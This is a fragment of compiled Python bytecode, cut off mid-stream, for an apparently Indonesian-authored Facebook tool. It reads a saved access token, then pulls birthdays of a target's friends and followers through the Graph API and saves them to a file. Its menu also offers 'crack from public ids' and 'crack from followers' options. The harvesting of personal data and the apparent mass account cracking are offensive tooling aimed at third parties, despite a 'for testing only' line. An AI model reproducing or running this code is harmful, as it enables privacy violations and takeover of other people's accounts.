\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x0f\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00R2\x00\x00\x00t\n\x00\x00\x00view_tokent\x0b\x00\x00\x00extract_dobR\x0b\x00\x00\x00t\x06\x00\x00\x00logoutR\x12\x00\x00\x00R\x13\x00\x00\x00R=\x00\x00\x00t\x03\x00\x00\x00strt\x03\x00\x00\x00lenR"\x00\x00\x00R#\x00\x00\x00R\x00\x00\x00\x00t\x03\x00\x00\x00map(\x0c\x00\x00\x00t\x06\x00\x00\x00selectR4\x00\x00\x00t\x03\x00\x00\x00idtR)\x00\x00\x00R*\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00iR7\x00\x00\x00t\x02\x00\x00\x00naR+\x00\x00\x00Ra\x00\x00\x00t\x01\x00\x00\x00p(\x00\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R=\x00\x00\x00\xc6\x00\x00\x00s\xce\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01\x1b\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01!\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01\x07\x01\x15\x01\r\x01\x05\x01\x05\x01\t\x01\x05\x03\x12\x80\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01)\x01\x05\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sO\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHd\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01d\x02\x00GHt\x03\x00d\x06\x00\x83\x01\x00\x01t\x04\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s#\x00\x00\x00\t \x1b[1;32mLogged In Token \x1b[0;97ms\t\x00\x00\x00 Token : s\x11\x00\x00\x00cat .fb_token.txts\x1a\x00\x00\x00 Press enter to main menu (\x05\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rc\x00\x00\x00\xb0\x01\x00\x00s\x14\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x05\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sQ\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00t\x03\x00\x17d\x04\x00\x17t\x04\x00\x17GHd\x02\x00GHt\x05\x00d\x05\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x06\x00\x83\x01\x00\x01t\x06\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x0b\x00\x00\x00Logout Menus&\x00\x00\x00\x1b[1;93mDo you really want to logout ? s\x14\x00\x00\x00rm -rf .fb_token.txt(\x07\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x0e\x00\x00\x00R\x0b\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Re\x00\x00\x00\xbb\x01\x00\x00s\x10\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\n\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x9a\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn+\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rF\x00\x01\x01\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x05\x00GHt\r\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00Ns\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00i\x01\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00Extract DOB Of IDs\x1f\x00\x00\x00\x1b[1;93m[1] Grab from friendlists\x1e\x00\x00\x00\x1b[1;93m[2] Grab from followerss\x19\x00\x00\x00\x1b[1;93m[3] Grab single ids\x0f\x00\x00\x00\x1b[1;93m[4] Back(\x0e\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x15\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00t\n\x00\x00\x00dob_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rd\x00\x00\x00\xc4\x01\x00\x00s \x00\x00\x00\x00\x02\x03\x01\x19\x01\x13\x01\r\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s~\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00rV\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00yD\x00t\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x04\x00d\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn5\x00\x04t\x0b\x00k\n\x00r\xce\x00\x01\x01\x01d\x04\x00GHd\x0c\x00t\x0c\x00\x17GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x05\x00x\xc7\x01|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\x0e\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0f\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\r\x01Wnv\x01|\x00\x00d\x14\x00k\x02\x00r\x8a\x02t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x15\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00yD\x00t\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17t\x06\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x04\x00d\x16\x00|\x04\x00d\x0b\x00\x19\x17GHWn\'\x00\x04t\x0b\x00k\n\x00r\xfe\x01\x01\x01\x01d\x17\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x07\x00|\x02\x00\x17d\x18\x00\x17t\x06\x00\x17d\x19\x00\x17d\t\x00t\x07\x00\x83\x01\x01}\x03\x00t\x08\x00j\t\x00|\x03\x00j\n\x00\x83\x01\x00}\x05\x00x\x93\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\x0e\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0f\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qA\x02WnB\x00|\x00\x00d\x1a\x00k\x02\x00r\xa0\x02t\x10\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x1b\x00k\x02\x00r\xb6\x02t\x11\x00\x83\x00\x00\x01n\x16\x00d\x04\x00GHd\x1c\x00GHd\x04\x00GHt\r\x00\x83\x00\x00\x01d\x1d\x00t\x12\x00t\x13\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHd\x1e\x00GHd\x1f\x00GHd\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GH\x87\x00\x00f\x01\x00d"\x00\x86\x00\x00}\n\x00t\x14\x00d#\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x15\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GHd$\x00GHd%\x00t\x12\x00t\x13\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd \x00d!\x00\x14GHd\x04\x00GHt\x00\x00d&\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01d\x00\x00S(\'\x00\x00\x00Ns\x14\x00\x00\x00\n Choose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s+\x00\x00\x00\t \x1b[1;32mGrab DOB From Friendlist\x1b[0;97ms\x0f\x00\x00\x00 Put Id/user : s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00s\x0c\x00\x00\x00Target Id : R\x17\x00\x00\x00s\x13\x00\x00\x00\x1b[1;31mID Not Founds\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R@\x00\x00\x00R\r\x00\x00\x00s&\x00\x00\x00\x1b[1;32m Grab DOB From Followers\x1b[0;97ms\x0e\x00\x00\x00Target user : s\x1f\x00\x00\x00\t \x1b[1;31mID Not Found\x1b[0;97ms\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000RA\x00\x00\x00RB\x00\x00\x00s&\x00\x00\x00\t \x1b[1;31mSelect valid option\x1b[0;97ms\x14\x00\x00\x00\x1b[1;93mTotal ID : s\x1e\x00\x00\x00\x1b[1;93mThe Process has starteds&\x00\x00\x00\x1b[1;93mNote : This is for testing onlyi/\x00\x00\x00RE\x00\x00\x00c\x01\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00s\xce\x00\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y\xa5\x00t\x01\x00j\x02\x00d\x02\x00|\x02\x00\x17d\x03\x00\x17t\x03\x00\x17d\x04\x00t\x04\x00\x83\x01\x01j\x05\x00}\x04\x00t\x06\x00j\x07\x00|\x04\x00\x83\x01\x00}\x05\x00|\x05\x00d\x05\x00\x19}\x06\x00d\x06\x00|\x02\x00\x17d\x07\x00\x17|\x03\x00\x17d\x08\x00\x17|\x06\x00\x17d\t\x00\x17GHt\x08\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\t\x00|\x03\x00d\x08\x00\x17|\x02\x00\x17d\x08\x00\x17|\x06\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\n\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00t\x0c\x00\x83\x01\x00\x01Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\r\x00\x00\x00NR@\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00t\x08\x00\x00\x00birthdays\x08\x00\x00\x00\x1b[1;32m s\t\x00\x00\x00 \x1b[1;30m s\x03\x00\x00\x00 | s\x07\x00\x00\x00\x1b[0;97ms\x08\x00\x00\x00dobs.txtRH\x00\x00\x00s\x01\x00\x00\x00\n(\r\x00\x00\x00RP\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00RR\x00\x00\x00t\x06\x00\x00\x00number(\x08\x00\x00\x00RS\x00\x00\x00RT\x00\x00\x00R7\x00\x00\x00R\x17\x00\x00\x00R*\x00\x00\x00RV\x00\x00\x00t\x01\x00\x00\x00yt\x03\x00\x00\x00nmb(\x01\x00\x00\x00t\x03\x00\x00\x00nms(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ra\x00\x00\x00\x19\x02\x00\x00s\x1a\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01$\x01\x0f\x01\n\x01\x1d\x01\x0f\x01!\x01\n\x01\x11\x02\x03\x01i\x1e\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;93mProcess has completeds\x14\x00\x00\x00\x1b[1;93mTotal DOB : s\x16\x00\x00\x00\n Press enter to back (\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R$\x00\x00\x00R\x13\x00\x00\x00Ro\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00t\x03\x00\x00\x00dobR\x0f\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R\x00\x00\x00\x00Rh\x00\x00\x00Rd\x00\x00\x00(\x0c\x00\x00\x00Ri\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R7\x00\x00\x00Rm\x00\x00\x00R+\x00\x00\x00Ra\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x01\x00\x00\x00Rt\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ro\x00\x00\x00\xd6\x01\x00\x00s\x98\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x03\x01!\x01\x12\x01\x11\x01\r\x01\x05\x01\t\x01\x05\x01\n\x01\x0b\x01!\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x03\x01!\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x02%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x05\x01\x05\x01\x07\x01\x15\x01\x05\x01\x05\x01\x05\x01\t\x01\x05\x02\x0f\x10\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01\x15\x01\x05\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb9\x01\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn+\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rF\x00\x01\x01\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHt\r\x00d\x08\x00\x83\x01\x00}\x00\x00t\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHt\x08\x00j\t\x00d\t\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01yA\x00t\x0e\x00j\x0f\x00d\n\x00|\x00\x00\x17d\x0b\x00\x17t\x02\x00\x17d\x0c\x00t\x10\x00\x83\x01\x01j\x11\x00}\x01\x00t\x12\x00j\x13\x00|\x01\x00\x83\x01\x00}\x02\x00|\x02\x00d\r\x00\x19}\x03\x00Wna\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rY\x01\x01\x01\x01t\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x0e\x00GHd\x05\x00GHt\r\x00d\x0f\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x10\x00|\x00\x00\x17GHd\x11\x00|\x03\x00\x17GHd\x05\x00GHd\x12\x00d\x13\x00\x14GHd\x05\x00GHt\x15\x00\x83\x00\x00\x01d\x00\x00S(\x14\x00\x00\x00Ns\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00i\x01\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x0e\x00\x00\x00Find DOB Of IDs\x0f\x00\x00\x00 Put id/user : s$\x00\x00\x00echo -e "\t Finding DOB " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00Rp\x00\x00\x00s\x14\x00\x00\x00\x1b[1;93mDOB not founds\x1a\x00\x00\x00 Press enter to try again s\x14\x00\x00\x00\x1b[1;93mAccount ID : s\r\x00\x00\x00\x1b[1;93mDOB : i/\x00\x00\x00RE\x00\x00\x00(\x16\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x15\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x0e\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00Rd\x00\x00\x00t\x04\x00\x00\x00conf(\x04\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00Rk\x00\x00\x00t\x04\x00\x00\x00dobs(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ru\x00\x00\x005\x02\x00\x00sR\x00\x00\x00\x00\x02\x03\x01\x19\x01\x13\x01\r\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\r\x01\x03\x01$\x01\x0f\x01\x0e\x01\x13\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\t\x01\t\x01\x05\x01\t\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r"\x00t\x01\x00\x83\x00\x00\x01n\x1d\x00|\x00\x00d\x03\x00k\x02\x00r8\x00t\x02\x00\x83\x00\x00\x01n\x07\x00t\x03\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ns\'\x00\x00\x00\x1b[1;93mDo you want to find again (y/n) Rr\x00\x00\x00t\x01\x00\x00\x00n(\x04\x00\x00\x00R\x0e\x00\x00\x00Ru\x00\x00\x00Rd\x00\x00\x00R\x0f\x00\x00\x00(\x01\x00\x00\x00t\x02\x00\x00\x00ol(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rv\x00\x00\x00`\x02\x00\x00s\x0c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xad\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01y\x19\x00t\x03\x00d\x02\x00d\x03\x00\x83\x02\x00j\x04\x00\x83\x00\x00a\x05\x00Wn\x1e\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00rM\x00\x01\x01\x01t\x08\x00\x83\x00\x00\x01n\x01\x00XyL\x00t\t\x00j\n\x00d\x04\x00t\x05\x00\x17\x83\x01\x00}\x00\x00t\x0b\x00j\x0c\x00|\x00\x00j\r\x00\x83\x01\x00}\x01\x00|\x01\x00d\x05\x00\x19}\x02\x00|\x02\x00j\x0e\x00d\x06\x00\x83\x01\x00d\x07\x00\x19}\x03\x00|\x03\x00}\x04\x00Wn\x9d\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00r\xef\x00\x01\x01\x01d\x08\x00GHd\t\x00t\x0f\x00\x17d\n\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x0b\x00\x83\x01\x00\x01t\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01nK\x00\x04t\t\x00j\x13\x00j\x14\x00k\n\x00r9\x01\x01\x01\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\r\x00GHd\x08\x00GHt\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x15\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\x0f\x00d\x10\x00\x14GHd\x08\x00GHd\x11\x00t\x0f\x00\x17d\x12\x00\x17|\x04\x00\x17t\x10\x00\x17GHd\x08\x00GHd\x0f\x00d\x10\x00\x14GHd\x08\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x08\x00GHt\x17\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00NR\x01\x00\x00\x00s\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R\x17\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00ID has checkpoints\x14\x00\x00\x00rm -rf .fb_token.txti\x01\x00\x00\x00s.\x00\x00\x00\t \x1b[1;31mTurn on mobile data OR wifi\x1b[0;97ms \x00\x00\x00\x1b[1;93mPress enter to try again i/\x00\x00\x00RE\x00\x00\x00s\x03\x00\x00\x00\t s\x0e\x00\x00\x00Logged In Users\x1f\x00\x00\x00\x1b[1;93m[1] Crack from public ids\x1f\x00\x00\x00\x1b[1;93m[2] Crack from followerss\x1d\x00\x00\x00\x1b[1;93m[3] Return method menus\x11\x00\x00\x00\x1b[1;93m[4] Logout(\x18\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x15\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R<\x00\x00\x00R\x02\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00t\r\x00\x00\x00l_menu_select(\x05\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00R>\x00\x00\x00R?\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x10\x00\x00\x00h\x02\x00\x00sT\x00\x00\x00\x00\x02\r\x01\x07\x01\x03\x01\x19\x01\x13\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\n\x01\x13\x01\x05\x01\x11\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x07\x01\x05\x01\x05\x01\x05\x01\r\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\t\x01\x05\x01\x15\x01\x05\x01\t\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00sq\x04\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00r\xb0\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyi\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r.\x01\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00xA\x02|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qg\x01Wn\xf0\x01|\x00\x00d\x14\x00k\x02\x00rR\x03t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x15\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyo\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17d\x16\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x8